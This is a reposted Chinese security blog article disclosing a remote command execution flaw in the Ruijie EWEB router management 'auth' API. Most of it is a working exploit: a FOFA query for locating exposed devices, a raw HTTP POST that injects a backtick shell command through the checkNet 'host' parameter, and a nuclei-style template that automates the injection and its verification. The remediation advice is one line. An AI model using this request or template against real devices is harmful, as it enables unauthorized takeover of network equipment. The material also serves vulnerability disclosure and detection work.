2025-12-30 01:30:35 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露了锐捷EWEB管理系统auth接口存在远程命令执行漏洞。攻击者可通过构造恶意POST请求利用checkNet方法执行系统命令，导致服务器失陷。文章提供了FOFA指纹、HTTP复现数据包及自动化检测脚本，并建议厂商更新最新版本以修复此高危风险。 综合评分： 88 文章分类： 漏洞POC,漏洞分析,WEB安全,IoT安全

cover_image

【漏洞复现】锐捷 EWEB auth 接口存在远程命令执行漏洞：复现与验证过程。

原创

xuzhiyang

玄武盾网络技术实验室

2025年12月29日 09:31 江西

*免责声明：本文仅供安全研究与学习之用，严禁使用本内容进行未经授权的违规渗透测试，遵守网络安全法，共同维护网络安全，违者后果自负。

每日学习资源分享：密码学教程

更多资源请访问：www.xwdjs.ysepan.com

长按图片识别二维码或微信扫码直接保存至网盘

正文

1、漏洞详情

锐捷睿易作为锐捷网络布局商业市场的专属子品牌，旗下囊括了易网络、交换机、路由器、无线设备、安全防护及云服务六大产品系列，其定制化解决方案可全面覆盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造生产、基础教育、基层医疗、中小政务等多类商业应用场景。
auth 接口存在远程代码执行（RCE）漏洞，不法攻击者一旦利用这一安全隐患植入并运行恶意指令，就有可能直接夺取服务器的控制权，造成服务器失陷的严重后果。

2、受影响版本

锐捷 EWEB

3、复现

FOFA：body="cgi-bin/luci"&nbsp;&& body="#f47f3e"

POST&nbsp;/cgi-bin/luci/api/auth&nbsp;HTTP/1.1Host:&nbsp;127.0.0.1Content-Type: application/jsonUser-Agent:&nbsp;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15&nbsp;(KHTML, like&nbsp;Gecko)&nbsp;Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo Hello tt!>tt.txt`"}}

尝试访问：http://127.0.0.1/cgi-bin/tt.txt

成功复现：

4、脚本

id:&nbsp;Ruijie-EWEB-auth-REC
info:&nbsp; name: auth接口存在RCE漏洞。&nbsp; author: tt&nbsp; severity: high&nbsp; metadata:&nbsp;&nbsp; &nbsp; fofa-query: body="cgi-bin/luci"&nbsp;&&&nbsp;body="#f47f3e"variables:&nbsp; filename:&nbsp;"{{to_lower(rand_base(10))}}"&nbsp; boundary:&nbsp;"{{to_lower(rand_base(20))}}"http:&nbsp;&nbsp;-&nbsp;raw:&nbsp; &nbsp; &nbsp;&nbsp;-&nbsp;|&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;POST&nbsp;/cgi-bin/luci/api/auth&nbsp;HTTP/1.1&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Host: {{Hostname}}&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Content-Type: application/json&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;User-Agent:&nbsp;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15&nbsp;(KHTML, like&nbsp;Gecko)&nbsp;Version/12.0.3 Safari/605.1.15
&nbsp; &nbsp; &nbsp; &nbsp; {"method":"checkNet","params":{"host":"`echo Hello tt!>{{filename}}.txt`"}}

&nbsp; &nbsp; &nbsp;&nbsp;-&nbsp;|&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;GET&nbsp;/cgi-bin/{{filename}}.txt&nbsp;HTTP/1.1&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Host: {{Hostname}}&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;User-Agent:&nbsp;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101&nbsp;Firefox/119.0

&nbsp; &nbsp; matchers:&nbsp; &nbsp; &nbsp;&nbsp;-&nbsp;type: dsl&nbsp; &nbsp; &nbsp; &nbsp; dsl:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;-&nbsp;status_code==200&nbsp;&&&nbsp;contains_all(body,"tt!")

5、修复建议

更新最新版本。

随手点个「推荐」吧！别逼我求你！！！

声明：技术文章均收集于互联网，仅作为本人学习、记录使用。侵权删！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：玄武盾网络技术实验室 xuzhiyang《【漏洞复现】锐捷 EWEB auth 接口存在远程命令执行漏洞：复现与验证过程。》